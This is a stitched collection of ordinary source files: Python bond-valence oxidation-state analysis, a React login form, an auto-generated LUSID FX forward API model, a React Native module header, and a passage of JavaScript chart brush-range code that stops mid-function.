        forbidden_species = [get_el_sp(sp) for sp in forbidden_species] if forbidden_species else []
        # Restrict the mined ICSD table to the species that are not forbidden.
        self.icsd_bv_data = (
            {get_el_sp(specie): data for specie, data in ICSD_BV_DATA.items() if specie not in forbidden_species}
            if len(forbidden_species) > 0
            else ICSD_BV_DATA
        )

    def _calc_site_probabilities(self, site, nn):
        """Return {oxi_state: normalized probability} for an ordered site,
        from a Gaussian likelihood around the mined BV-sum mean times the
        ICSD occurrence prior."""
        el = site.specie.symbol
        bv_sum = calculate_bv_sum(site, nn, scale_factor=self.dist_scale_factor)
        prob = {}
        for sp, data in self.icsd_bv_data.items():
            if sp.symbol == el and sp.oxi_state != 0 and data["std"] > 0:
                u = data["mean"]
                sigma = data["std"]
                # Calculate posterior probability. Note that constant
                # factors are ignored. They have no effect on the results.
                prob[sp.oxi_state] = exp(-((bv_sum - u) ** 2) / 2 / (sigma ** 2)) / sigma * PRIOR_PROB[sp]
        # Normalize the probabilities
        try:
            prob = {k: v / sum(prob.values()) for k, v in prob.items()}
        except ZeroDivisionError:
            prob = {k: 0.0 for k in prob}
        return prob

    def _calc_site_probabilities_unordered(self, site, nn):
        """Like _calc_site_probabilities, but returns a nested mapping
        {element symbol: {oxi_state: probability}} covering every partial
        occupant of the site."""
        bv_sum = calculate_bv_sum_unordered(site, nn, scale_factor=self.dist_scale_factor)
        prob = {}
        for specie, occu in site.species.items():
            el = specie.symbol
            prob[el] = {}
            for sp, data in self.icsd_bv_data.items():
                if sp.symbol == el and sp.oxi_state != 0 and data["std"] > 0:
                    u = data["mean"]
                    sigma = data["std"]
                    # Calculate posterior probability. Note that constant
                    # factors are ignored. They have no effect on the results.
                    prob[el][sp.oxi_state] = exp(-((bv_sum - u) ** 2) / 2 / (sigma ** 2)) / sigma * PRIOR_PROB[sp]
            # Normalize the probabilities
            try:
                prob[el] = {k: v / sum(prob[el].values()) for k, v in prob[el].items()}
            except ZeroDivisionError:
                prob[el] = {k: 0.0 for k in prob[el]}
        return prob

    def get_valences(self, structure):
        """
        Returns a list of valences for the structure. This currently works only
        for ordered structures only.

        Args:
            structure: Structure to analyze

        Returns:
            A list of valences for each site in the structure (for an ordered
            structure), e.g., [1, 1, -2] or a list of lists with the
            valences for each fractional element of each site in the
            structure (for an unordered structure),
            e.g., [[2, 4], [3], [-2], [-2], [-2]]

        Raises:
            A ValueError if the valences cannot be determined.
        """
        els = [Element(el.symbol) for el in structure.composition.elements]
        if not set(els).issubset(set(BV_PARAMS.keys())):
            raise ValueError("Structure contains elements not in set of BV parameters!")

        # Perform symmetry determination and get sites grouped by symmetry.
        if self.symm_tol:
            finder = SpacegroupAnalyzer(structure, self.symm_tol)
            symm_structure = finder.get_symmetrized_structure()
            equi_sites = symm_structure.equivalent_sites
        else:
            equi_sites = [[site] for site in structure]

        # Sort the equivalent sites by decreasing electronegativity.
        equi_sites = sorted(equi_sites, key=lambda sites: -sites[0].species.average_electroneg)

        # Get a list of valences and probabilities for each symmetrically
        # distinct site.
        valences = []
        all_prob = []
        if structure.is_ordered:
            for sites in equi_sites:
                test_site = sites[0]
                nn = structure.get_neighbors(test_site, self.max_radius)
                prob = self._calc_site_probabilities(test_site, nn)
                all_prob.append(prob)
                val = list(prob.keys())
                # Sort valences in order of decreasing probability.
                val = sorted(val, key=lambda v: -prob[v])
                # Retain probabilities that are at least 1/100 of highest prob.
                valences.append(list(filter(lambda v: prob[v] > 0.01 * prob[val[0]], val)))
        else:
            full_all_prob = []
            for sites in equi_sites:
                test_site = sites[0]
                nn = structure.get_neighbors(test_site, self.max_radius)
                prob = self._calc_site_probabilities_unordered(test_site, nn)
                all_prob.append(prob)
                full_all_prob.extend(prob.values())
                vals = []
                for (elsp, occ) in get_z_ordered_elmap(test_site.species):
                    val = list(prob[elsp.symbol].keys())
                    # Sort valences in order of decreasing probability.
                    val = sorted(val, key=lambda v: -prob[elsp.symbol][v])
                    # Retain probabilities that are at least 1/100 of highest
                    # prob.
                    vals.append(
                        list(
                            filter(
                                lambda v: prob[elsp.symbol][v] > 0.001 * prob[elsp.symbol][val[0]],
                                val,
                            )
                        )
                    )
                valences.append(vals)

        # make variables needed for recursion
        if structure.is_ordered:
            nsites = np.array([len(i) for i in equi_sites])
            vmin = np.array([min(i) for i in valences])
            vmax = np.array([max(i) for i in valences])

            self._n = 0
            self._best_score = 0
            self._best_vset = None

            def evaluate_assignment(v_set):
                # Score a complete valence assignment; keep the best one seen.
                el_oxi = collections.defaultdict(list)
                for i, sites in enumerate(equi_sites):
                    el_oxi[sites[0].specie.symbol].append(v_set[i])
                # Reject assignments where one element spans > 1 oxidation
                # state difference across sites.
                max_diff = max([max(v) - min(v) for v in el_oxi.values()])
                if max_diff > 1:
                    return
                score = functools.reduce(operator.mul, [all_prob[i][v] for i, v in enumerate(v_set)])
                if score > self._best_score:
                    self._best_vset = v_set
                    self._best_score = score

            def _recurse(assigned=[]):
                # recurses to find permutations of valences based on whether a
                # charge balanced assignment can still be found
                # (the mutable default is safe: `assigned` is only read here,
                # never mutated in place)
                if self._n > self.max_permutations:
                    return None
                i = len(assigned)
                # Bound the achievable total charge with the already-assigned
                # prefix plus the extreme valences of the remaining sites;
                # prune branches that can never reach neutrality.
                highest = vmax.copy()
                highest[:i] = assigned
                highest *= nsites
                highest = np.sum(highest)
                lowest = vmin.copy()
                lowest[:i] = assigned
                lowest *= nsites
                lowest = np.sum(lowest)
                if highest < 0 or lowest > 0:
                    self._n += 1
                    return None
                if i == len(valences):
                    evaluate_assignment(assigned)
                    self._n += 1
                    return None
                for v in valences[i]:
                    new_assigned = list(assigned)
                    _recurse(new_assigned + [v])
                return None

        else:
            nsites = np.array([len(i) for i in equi_sites])
            # Flatten per-site valence lists into per-fraction entries;
            # `attrib` records which equivalent-site group each entry came from.
            tmp = []
            attrib = []
            for insite, nsite in enumerate(nsites):
                for val in valences[insite]:
                    tmp.append(nsite)
                    attrib.append(insite)
            new_nsites = np.array(tmp)
            fractions = []
            elements = []
            for sites in equi_sites:
                for sp, occu in get_z_ordered_elmap(sites[0].species):
                    elements.append(sp.symbol)
                    fractions.append(occu)
            fractions = np.array(fractions, np.float_)
            new_valences = []
            for vals in valences:
                for val in vals:
                    new_valences.append(val)
            vmin = np.array([min(i) for i in new_valences], np.float_)
            vmax = np.array([max(i) for i in new_valences], np.float_)

            self._n = 0
            self._best_score = 0
            self._best_vset = None

            def evaluate_assignment(v_set):
                # Score a complete per-fraction valence assignment.
                el_oxi = collections.defaultdict(list)
                jj = 0
                for i, sites in enumerate(equi_sites):
                    for specie, occu in get_z_ordered_elmap(sites[0].species):
                        el_oxi[specie.symbol].append(v_set[jj])
                        jj += 1
                # Looser spread limit (2) than the ordered case (1).
                max_diff = max([max(v) - min(v) for v in el_oxi.values()])
                if max_diff > 2:
                    return
                score = functools.reduce(
                    operator.mul,
                    [all_prob[attrib[iv]][elements[iv]][vv] for iv, vv in enumerate(v_set)],
                )
                if score > self._best_score:
                    self._best_vset = v_set
                    self._best_score = score

            def _recurse(assigned=[]):
                # recurses to find permutations of valences based on whether a
                # charge balanced assignment can still be found
                # (the mutable default is safe: `assigned` is only read here,
                # never mutated in place)
                if self._n > self.max_permutations:
                    return None
                i = len(assigned)
                # Same pruning as the ordered case, but weighted by the
                # site multiplicities and fractional occupancies.
                highest = vmax.copy()
                highest[:i] = assigned
                highest *= new_nsites
                highest *= fractions
                highest = np.sum(highest)
                lowest = vmin.copy()
                lowest[:i] = assigned
                lowest *= new_nsites
                lowest *= fractions
                lowest = np.sum(lowest)
                if highest < -self.charge_neutrality_tolerance or lowest > self.charge_neutrality_tolerance:
                    self._n += 1
                    return None
                if i == len(new_valences):
                    evaluate_assignment(assigned)
                    self._n += 1
                    return None
                for v in new_valences[i]:
                    new_assigned = list(assigned)
                    _recurse(new_assigned + [v])
                return None

        _recurse()
        if self._best_vset:
            if structure.is_ordered:
                # Expand the per-equivalent-group assignment back to every site.
                assigned = {}
                for val, sites in zip(self._best_vset, equi_sites):
                    for site in sites:
                        assigned[site] = val
                return [int(assigned[site]) for site in structure]
            # Unordered: regroup the flat per-fraction assignment by site.
            assigned = {}
            new_best_vset = []
            for ii in range(len(equi_sites)):
                new_best_vset.append(list())
            for ival, val in enumerate(self._best_vset):
                new_best_vset[attrib[ival]].append(val)
            for val, sites in zip(new_best_vset, equi_sites):
                for site in sites:
                    assigned[site] = val
            return [[int(frac_site) for frac_site in assigned[site]] for site in structure]
        raise ValueError("Valences cannot be assigned!")

    def get_oxi_state_decorated_structure(self, structure):
        """
        Get an oxidation state decorated structure. This currently works only
        for ordered structures only.

        Args:
            structure: Structure to analyze

        Returns:
            A modified structure that is oxidation state decorated.

        Raises:
            ValueError if the valences cannot be determined.
        """
        # Work on a copy so the caller's structure is left untouched.
        s = structure.copy()
        if s.is_ordered:
            valences = self.get_valences(s)
            s.add_oxidation_state_by_site(valences)
        else:
            valences = self.get_valences(s)
            s = add_oxidation_state_by_site_fraction(s, valences)
        return s
def get_z_ordered_elmap(comp):
    """
    Produce a deterministically ordered list of (element_or_specie,
    occupation) tuples for the species on one site of an unordered
    structure.

    The order is the natural sort order of the species objects (for
    pymatgen species this sorts by Z, with smaller fractional occupations
    breaking ties). Example: {"Ni3+": 0.2, "Ni4+": 0.2, "Cr3+": 0.15,
    "Zn2+": 0.34, "Cr4+": 0.11} yields the species in the order
    Cr4+, Cr3+, Ni3+, Ni4+, Zn2+ ... or Cr4+, Cr3+, Ni4+, Ni3+, Zn2+.
    """
    pairs = [(species, comp[species]) for species in comp.keys()]
    pairs.sort()
    return pairs
def add_oxidation_state_by_site_fraction(structure, oxidation_states):
    """
    Decorate a structure with oxidation states assigned per site fraction.

    Args:
        structure: Structure to decorate (modified in place and returned).
        oxidation_states (list): List of list of oxidation states for each
            site fraction for each site.
            E.g., [[2, 4], [3], [-2], [-2], [-2]]

    Raises:
        ValueError: if the list does not cover every site fraction.
    """
    try:
        for site_idx, site in enumerate(structure):
            species_map = collections.defaultdict(float)
            ordered_species = get_z_ordered_elmap(site.species)
            for frac_idx, (el, occu) in enumerate(ordered_species):
                decorated = Species(el.symbol, oxidation_states[site_idx][frac_idx])
                species_map[decorated] += occu
            structure[site_idx] = species_map
        return structure
    except IndexError:
        raise ValueError("Oxidation state of all sites must be " "specified in the list.")
|
import React, { useContext, useState } from "react";
import { Alert, Button, Container, Form, Spinner } from "react-bootstrap";
import AuthService from "../../services/AuthService";
import { AuthContext } from "../../context/auth/AuthContext";
import { LoginFailed, LoginStart, LoginSuccess } from "../../context/auth/AuthActions";
export default function Login() {
const [email, setEmail] = useState("");
const [password, setPassword] = useState("");
const [error, setError] = useState(null);
const { isFetching, dispatch } = useContext(AuthContext);
const handleEmailChange = (e) => {
setEmail(e.target.value);
};
const handlePasswordChange = (e) => {
setPassword(e.target.value);
};
const handleSubmit = (e) => {
e.preventDefault();
dispatch(LoginStart());
const userCredentials = { email, password };
// Login, then get logged user and dispatch to reducer
AuthService.login(userCredentials)
.then((loginRes) => {
AuthService.getAuthUser()
.then((userRes) => {
dispatch(LoginSuccess(userRes.data));
})
.catch((err) => {
dispatch(LoginFailed());
console.log(err);
});
})
.catch((err) => {
dispatch(LoginFailed());
setPassword("");
setError(err.response.data.message);
});
};
return (
<section className="position-relative" style={{ height: "calc(100vh - 61.6px)" }}>
<Container className="col-8 col-md-6 col-lg-4 shadow-lg p-4 position-absolute start-50 top-50" style={{ transform: "translate(-50%, -50%)" }}>
<h3 className="text-center text-primary mb-4">Login</h3>
<Form onSubmit={handleSubmit}>
<Form.Group className="mb-4" controlId="formBasicEmail">
<Form.Control onChange={handleEmailChange} value={email} type="email" placeholder="Email" />
</Form.Group>
<Form.Group className="mb-4" controlId="formBasicPassword">
<Form.Control onChange={handlePasswordChange} value={password} type="password" placeholder="Password" />
</Form.Group>
{error && <Alert variant="danger">{error}</Alert>}
<Button disabled={isFetching} className="bg-primary" type="submit" style={{ width: "80px" }}>
{isFetching ? (
<Spinner size="sm" animation="border" role="status">
<span className="visually-hidden">Loading...</span>
</Spinner>
) : (
"Login"
)}
</Button>
</Form>
</Container>
</section>
);
}
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3192
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class FxForwardAllOf(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
      required_map (dict): The key is attribute name
                           and the value is whether it is 'required' or 'optional'.
    """
    # Attribute name -> OpenAPI type; consumed by to_dict() when serialising.
    openapi_types = {
        'start_date': 'datetime',
        'maturity_date': 'datetime',
        'dom_amount': 'float',
        'dom_ccy': 'str',
        'fgn_amount': 'float',
        'fgn_ccy': 'str',
        'ref_spot_rate': 'float',
        'is_ndf': 'bool',
        'fixing_date': 'datetime',
        'instrument_type': 'str'
    }

    # Attribute name -> JSON key used in the API payload.
    attribute_map = {
        'start_date': 'startDate',
        'maturity_date': 'maturityDate',
        'dom_amount': 'domAmount',
        'dom_ccy': 'domCcy',
        'fgn_amount': 'fgnAmount',
        'fgn_ccy': 'fgnCcy',
        'ref_spot_rate': 'refSpotRate',
        'is_ndf': 'isNdf',
        'fixing_date': 'fixingDate',
        'instrument_type': 'instrumentType'
    }

    # Attribute name -> 'required'/'optional' per the OpenAPI definition.
    required_map = {
        'start_date': 'required',
        'maturity_date': 'required',
        'dom_amount': 'required',
        'dom_ccy': 'required',
        'fgn_amount': 'required',
        'fgn_ccy': 'required',
        'ref_spot_rate': 'optional',
        'is_ndf': 'optional',
        'fixing_date': 'optional',
        'instrument_type': 'required'
    }

    def __init__(self, start_date=None, maturity_date=None, dom_amount=None, dom_ccy=None, fgn_amount=None, fgn_ccy=None, ref_spot_rate=None, is_ndf=None, fixing_date=None, instrument_type=None):  # noqa: E501
        """
        FxForwardAllOf - a model defined in OpenAPI

        :param start_date:  The start date of the instrument. This is normally synonymous with the trade-date. (required)
        :type start_date: datetime
        :param maturity_date:  The final maturity date of the instrument. This means the last date on which the instruments makes a payment of any amount. For the avoidance of doubt, that is not necessarily prior to its last sensitivity date for the purposes of risk; e.g. instruments such as Constant Maturity Swaps (CMS) often have sensitivities to rates beyond their last payment date (required)
        :type maturity_date: datetime
        :param dom_amount:  The amount that is to be paid in the domestic currency on the maturity date. (required)
        :type dom_amount: float
        :param dom_ccy:  The domestic currency of the instrument. (required)
        :type dom_ccy: str
        :param fgn_amount:  The amount that is to be paid in the foreign currency on the maturity date (required)
        :type fgn_amount: float
        :param fgn_ccy:  The foreign (other) currency of the instrument. In the NDF case, only payments are made in the domestic currency. For the outright forward, currencies are exchanged. By domestic is then that of the portfolio. (required)
        :type fgn_ccy: str
        :param ref_spot_rate:  The reference Fx Spot rate for currency pair Foreign-Domestic that was seen on the trade start date (time).
        :type ref_spot_rate: float
        :param is_ndf:  Is the contract an Fx-Forward of \"Non-Deliverable\" type, meaning a single payment in the domestic currency based on the change in fx-rate vs a reference rate is used.
        :type is_ndf: bool
        :param fixing_date:  The fixing date .
        :type fixing_date: datetime
        :param instrument_type:  The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CashSettled, CdsIndex, Basket, FundingLeg, CrossCurrencySwap, FxSwap (required)
        :type instrument_type: str

        """  # noqa: E501
        # Private backing fields for the managed properties below.
        self._start_date = None
        self._maturity_date = None
        self._dom_amount = None
        self._dom_ccy = None
        self._fgn_amount = None
        self._fgn_ccy = None
        self._ref_spot_rate = None
        self._is_ndf = None
        self._fixing_date = None
        self._instrument_type = None
        # No polymorphic discriminator for this model.
        self.discriminator = None

        # Required attributes are assigned unconditionally; their setters
        # raise ValueError if the value is None.
        self.start_date = start_date
        self.maturity_date = maturity_date
        self.dom_amount = dom_amount
        self.dom_ccy = dom_ccy
        self.fgn_amount = fgn_amount
        self.fgn_ccy = fgn_ccy
        # Optional attributes are only assigned when a value was provided.
        if ref_spot_rate is not None:
            self.ref_spot_rate = ref_spot_rate
        if is_ndf is not None:
            self.is_ndf = is_ndf
        if fixing_date is not None:
            self.fixing_date = fixing_date
        self.instrument_type = instrument_type

    @property
    def start_date(self):
        """Gets the start_date of this FxForwardAllOf.  # noqa: E501

        The start date of the instrument. This is normally synonymous with the trade-date.  # noqa: E501

        :return: The start_date of this FxForwardAllOf.  # noqa: E501
        :rtype: datetime
        """
        return self._start_date

    @start_date.setter
    def start_date(self, start_date):
        """Sets the start_date of this FxForwardAllOf.

        The start date of the instrument. This is normally synonymous with the trade-date.  # noqa: E501

        :param start_date: The start_date of this FxForwardAllOf.  # noqa: E501
        :type: datetime
        """
        # Required field: reject None.
        if start_date is None:
            raise ValueError("Invalid value for `start_date`, must not be `None`")  # noqa: E501

        self._start_date = start_date

    @property
    def maturity_date(self):
        """Gets the maturity_date of this FxForwardAllOf.  # noqa: E501

        The final maturity date of the instrument. This means the last date on which the instruments makes a payment of any amount. For the avoidance of doubt, that is not necessarily prior to its last sensitivity date for the purposes of risk; e.g. instruments such as Constant Maturity Swaps (CMS) often have sensitivities to rates beyond their last payment date  # noqa: E501

        :return: The maturity_date of this FxForwardAllOf.  # noqa: E501
        :rtype: datetime
        """
        return self._maturity_date

    @maturity_date.setter
    def maturity_date(self, maturity_date):
        """Sets the maturity_date of this FxForwardAllOf.

        The final maturity date of the instrument. This means the last date on which the instruments makes a payment of any amount. For the avoidance of doubt, that is not necessarily prior to its last sensitivity date for the purposes of risk; e.g. instruments such as Constant Maturity Swaps (CMS) often have sensitivities to rates beyond their last payment date  # noqa: E501

        :param maturity_date: The maturity_date of this FxForwardAllOf.  # noqa: E501
        :type: datetime
        """
        # Required field: reject None.
        if maturity_date is None:
            raise ValueError("Invalid value for `maturity_date`, must not be `None`")  # noqa: E501

        self._maturity_date = maturity_date

    @property
    def dom_amount(self):
        """Gets the dom_amount of this FxForwardAllOf.  # noqa: E501

        The amount that is to be paid in the domestic currency on the maturity date.  # noqa: E501

        :return: The dom_amount of this FxForwardAllOf.  # noqa: E501
        :rtype: float
        """
        return self._dom_amount

    @dom_amount.setter
    def dom_amount(self, dom_amount):
        """Sets the dom_amount of this FxForwardAllOf.

        The amount that is to be paid in the domestic currency on the maturity date.  # noqa: E501

        :param dom_amount: The dom_amount of this FxForwardAllOf.  # noqa: E501
        :type: float
        """
        # Required field: reject None.
        if dom_amount is None:
            raise ValueError("Invalid value for `dom_amount`, must not be `None`")  # noqa: E501

        self._dom_amount = dom_amount

    @property
    def dom_ccy(self):
        """Gets the dom_ccy of this FxForwardAllOf.  # noqa: E501

        The domestic currency of the instrument.  # noqa: E501

        :return: The dom_ccy of this FxForwardAllOf.  # noqa: E501
        :rtype: str
        """
        return self._dom_ccy

    @dom_ccy.setter
    def dom_ccy(self, dom_ccy):
        """Sets the dom_ccy of this FxForwardAllOf.

        The domestic currency of the instrument.  # noqa: E501

        :param dom_ccy: The dom_ccy of this FxForwardAllOf.  # noqa: E501
        :type: str
        """
        # Required field: reject None.
        if dom_ccy is None:
            raise ValueError("Invalid value for `dom_ccy`, must not be `None`")  # noqa: E501

        self._dom_ccy = dom_ccy

    @property
    def fgn_amount(self):
        """Gets the fgn_amount of this FxForwardAllOf.  # noqa: E501

        The amount that is to be paid in the foreign currency on the maturity date  # noqa: E501

        :return: The fgn_amount of this FxForwardAllOf.  # noqa: E501
        :rtype: float
        """
        return self._fgn_amount

    @fgn_amount.setter
    def fgn_amount(self, fgn_amount):
        """Sets the fgn_amount of this FxForwardAllOf.

        The amount that is to be paid in the foreign currency on the maturity date  # noqa: E501

        :param fgn_amount: The fgn_amount of this FxForwardAllOf.  # noqa: E501
        :type: float
        """
        # Required field: reject None.
        if fgn_amount is None:
            raise ValueError("Invalid value for `fgn_amount`, must not be `None`")  # noqa: E501

        self._fgn_amount = fgn_amount

    @property
    def fgn_ccy(self):
        """Gets the fgn_ccy of this FxForwardAllOf.  # noqa: E501

        The foreign (other) currency of the instrument. In the NDF case, only payments are made in the domestic currency. For the outright forward, currencies are exchanged. By domestic is then that of the portfolio.  # noqa: E501

        :return: The fgn_ccy of this FxForwardAllOf.  # noqa: E501
        :rtype: str
        """
        return self._fgn_ccy

    @fgn_ccy.setter
    def fgn_ccy(self, fgn_ccy):
        """Sets the fgn_ccy of this FxForwardAllOf.

        The foreign (other) currency of the instrument. In the NDF case, only payments are made in the domestic currency. For the outright forward, currencies are exchanged. By domestic is then that of the portfolio.  # noqa: E501

        :param fgn_ccy: The fgn_ccy of this FxForwardAllOf.  # noqa: E501
        :type: str
        """
        # Required field: reject None.
        if fgn_ccy is None:
            raise ValueError("Invalid value for `fgn_ccy`, must not be `None`")  # noqa: E501

        self._fgn_ccy = fgn_ccy

    @property
    def ref_spot_rate(self):
        """Gets the ref_spot_rate of this FxForwardAllOf.  # noqa: E501

        The reference Fx Spot rate for currency pair Foreign-Domestic that was seen on the trade start date (time).  # noqa: E501

        :return: The ref_spot_rate of this FxForwardAllOf.  # noqa: E501
        :rtype: float
        """
        return self._ref_spot_rate

    @ref_spot_rate.setter
    def ref_spot_rate(self, ref_spot_rate):
        """Sets the ref_spot_rate of this FxForwardAllOf.

        The reference Fx Spot rate for currency pair Foreign-Domestic that was seen on the trade start date (time).  # noqa: E501

        :param ref_spot_rate: The ref_spot_rate of this FxForwardAllOf.  # noqa: E501
        :type: float
        """
        # Optional field: no validation.
        self._ref_spot_rate = ref_spot_rate

    @property
    def is_ndf(self):
        """Gets the is_ndf of this FxForwardAllOf.  # noqa: E501

        Is the contract an Fx-Forward of \"Non-Deliverable\" type, meaning a single payment in the domestic currency based on the change in fx-rate vs a reference rate is used.  # noqa: E501

        :return: The is_ndf of this FxForwardAllOf.  # noqa: E501
        :rtype: bool
        """
        return self._is_ndf

    @is_ndf.setter
    def is_ndf(self, is_ndf):
        """Sets the is_ndf of this FxForwardAllOf.

        Is the contract an Fx-Forward of \"Non-Deliverable\" type, meaning a single payment in the domestic currency based on the change in fx-rate vs a reference rate is used.  # noqa: E501

        :param is_ndf: The is_ndf of this FxForwardAllOf.  # noqa: E501
        :type: bool
        """
        # Optional field: no validation.
        self._is_ndf = is_ndf

    @property
    def fixing_date(self):
        """Gets the fixing_date of this FxForwardAllOf.  # noqa: E501

        The fixing date .  # noqa: E501

        :return: The fixing_date of this FxForwardAllOf.  # noqa: E501
        :rtype: datetime
        """
        return self._fixing_date

    @fixing_date.setter
    def fixing_date(self, fixing_date):
        """Sets the fixing_date of this FxForwardAllOf.

        The fixing date .  # noqa: E501

        :param fixing_date: The fixing_date of this FxForwardAllOf.  # noqa: E501
        :type: datetime
        """
        # Optional field: no validation.
        self._fixing_date = fixing_date

    @property
    def instrument_type(self):
        """Gets the instrument_type of this FxForwardAllOf.  # noqa: E501

        The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CashSettled, CdsIndex, Basket, FundingLeg, CrossCurrencySwap, FxSwap  # noqa: E501

        :return: The instrument_type of this FxForwardAllOf.  # noqa: E501
        :rtype: str
        """
        return self._instrument_type

    @instrument_type.setter
    def instrument_type(self, instrument_type):
        """Sets the instrument_type of this FxForwardAllOf.

        The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CashSettled, CdsIndex, Basket, FundingLeg, CrossCurrencySwap, FxSwap  # noqa: E501

        :param instrument_type: The instrument_type of this FxForwardAllOf.  # noqa: E501
        :type: str
        """
        # Required field with a closed set of allowed enum values.
        if instrument_type is None:
            raise ValueError("Invalid value for `instrument_type`, must not be `None`")  # noqa: E501
        allowed_values = ["QuotedSecurity", "InterestRateSwap", "FxForward", "Future", "ExoticInstrument", "FxOption", "CreditDefaultSwap", "InterestRateSwaption", "Bond", "EquityOption", "FixedLeg", "FloatingLeg", "BespokeCashFlowsLeg", "Unknown", "TermDeposit", "ContractForDifference", "EquitySwap", "CashPerpetual", "CashSettled", "CdsIndex", "Basket", "FundingLeg", "CrossCurrencySwap", "FxSwap"]  # noqa: E501
        if instrument_type not in allowed_values:
            raise ValueError(
                "Invalid value for `instrument_type` ({0}), must be one of {1}"  # noqa: E501
                .format(instrument_type, allowed_values)
            )

        self._instrument_type = instrument_type

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialise every declared attribute; nested models
        # expose to_dict(), lists and dicts are walked element-wise.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, FxForwardAllOf):
            return False

        # Compares all instance attributes (the private backing fields).
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
#import <React/RCTBridgeModule.h>
// Declares the Multibundle native module for the React Native bridge.
// Method exports (RCT_EXPORT_MODULE / RCT_EXPORT_METHOD) live in the
// corresponding implementation (.m) file.
@interface Multibundle : NSObject <RCTBridgeModule>
@end
|
import {
getMoveDelta,
nodes
} from './brush-range-node-builder';
import {
startArea,
moveArea,
endArea
} from './brush-range-interaction';
import rangeCollection from '../../../core/brush/range-collection';
import {
TARGET_SIZE,
VERTICAL,
HORIZONTAL
} from './brush-range-const';
// Re-render the brush visuals (lines, bubbles, target overlay) from state.
function render(state) {
  const { renderer } = state;
  renderer.render(nodes(state));
}
// Current set of brushed ranges, delegated to the range collection.
function ranges(state) {
  const { rc } = state;
  return rc.ranges();
}
// Translate a brushed {min, max} range into a query rectangle (oriented by
// state.direction) and return the chart shapes it covers.
function shapesFromRange(state, brushRange) {
  const { rect, direction } = state;
  const span = brushRange.max - brushRange.min;
  const shapeAt = direction
    ? { x: brushRange.min + rect.x, y: rect.y, width: span, height: rect.height + rect.y }
    : { x: rect.x, y: brushRange.min + rect.y, width: rect.width + rect.x, height: span };
  return state.chart.shapesAt(shapeAt, state.settings.brush);
}
// Forward the resolved shapes to the chart's brush context.
function brushFromShape(state, newShapes) {
  const { chart, settings } = state;
  chart.brushFromShapes(newShapes, settings.brush);
}
// Apply the in-progress interaction to the range collection and brush.
// Modifies the active range (resize or move) or appends a new one, then
// pushes the covered shapes into the brush context.
function setRanges(state) {
  const updated = state.ranges.map(({ min, max }) => ({ min, max }));
  const lo = Math.min(state.start, state.current);
  const hi = Math.max(state.start, state.current);

  if (state.active.idx === -1) {
    // No active range: the gesture defines a brand new one.
    updated.push({ min: lo, max: hi });
  } else if (state.active.mode === 'modify') {
    // Resizing an existing range from one of its edges.
    updated[state.active.idx].min = lo;
    updated[state.active.idx].max = hi;
  } else {
    // Dragging the whole range by the gesture delta.
    const delta = getMoveDelta(state);
    updated[state.active.idx].min = state.active.start + delta;
    updated[state.active.idx].max = state.active.end + delta;
  }

  state.rc.set(updated);

  const collected = [];
  updated.forEach((range) => {
    collected.push(...shapesFromRange(state, range));
  });
  brushFromShape(state, collected);
}
// Resolve the label text for a range bubble. `value` is the edge being
// labelled (the min or max of `range`); the shape whose bound is closest to
// that edge provides the label.
function getBubbleLabel(state, value, range) {
  const min = Math.min(...range);
  const max = Math.max(...range);
  // Rectangle covering the whole brushed span, oriented by state.direction.
  const shapeAt = {
    x: state.direction ? min + state.rect.x : state.rect.x,
    y: state.direction ? state.rect.y : min + state.rect.y,
    width: state.direction ? max - min : state.rect.width + state.rect.x,
    height: state.direction ? state.rect.height + state.rect.y : max - min
  };
  const shapes = state.chart.shapesAt(shapeAt, state.settings.brush);
  // No shapes under the brushed area: show a dash placeholder.
  if (shapes.length === 0) {
    return '-';
  }
  const labelShape = shapes.reduce((s0, s1) => {
    // Min value
    const bounds0 = s0.bounds;
    const bounds1 = s1.bounds;
    if (value === min) {
      // Min edge: keep the shape with the smallest start coordinate.
      if (bounds0[state.cssCoord.coord] <= bounds1[state.cssCoord.coord]) {
        return s0;
      }
      return s1;
    }
    // Max value
    // Max edge: keep the shape with the largest end coordinate (start + extent).
    if (bounds0[state.cssCoord.coord] + bounds0[state.cssCoord.area] >= bounds1[state.cssCoord.coord] + bounds1[state.cssCoord.area]) {
      return s0;
    }
    return s1;
  });
  // Brush component configuration whose key matches the selected shape.
  const compConfig = state.settings.brush.components.reduce((c0, c1) => (c0.key === labelShape.key ? c0 : c1));
  if (typeof state.settings.bubbles.label === 'function') {
    // A custom label callback takes precedence over any data-derived label.
    return state.settings.bubbles.label(labelShape.data);
  } else if (Array.isArray(compConfig.data) && compConfig.data.length) {
    // Use the label of the first configured data field.
